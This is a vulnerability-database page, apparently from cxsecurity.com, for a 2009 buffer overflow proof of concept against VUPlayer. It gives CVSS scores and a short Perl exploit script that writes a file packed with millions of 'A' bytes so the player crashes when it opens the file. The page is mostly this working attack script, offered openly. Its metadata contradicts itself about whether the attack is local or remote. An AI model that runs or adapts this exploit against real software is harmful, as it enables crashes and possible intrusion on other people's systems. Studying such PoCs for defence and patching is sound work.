VUPLAYER BufferOver flow POC

2009.01.22
Credit: AlpHaNiX
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl system("color 3"); if (@ARGV != 1) { &help; exit(); } sub help(){ print "[X] Usage : ./exploit.pl filename \n"; } { $file = $ARGV[0]; } print "\n [X]*******************************************\n"; print " [X] VUPLAYER BufferOver flow POC *\n"; print " [X] Coded By AlpHaNiX *\n"; print " [X] From Null Area *\n"; print " [X]*******************************************\n\n"; print "[+] Exploiting.....\n" ; my $buff="\x41\x41\x41\x41" x 1000000 ; print "[+] Creating Evil File" ; open($FILE, ">>$file") or die "Cannot open $file"; print $FILE $buff; close($FILE); print "\n[+] Please wait while creating $file"; print "\n[+] $file has been created";

References:

http://www.securityfocus.com/archive/1/archive/1/499810/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top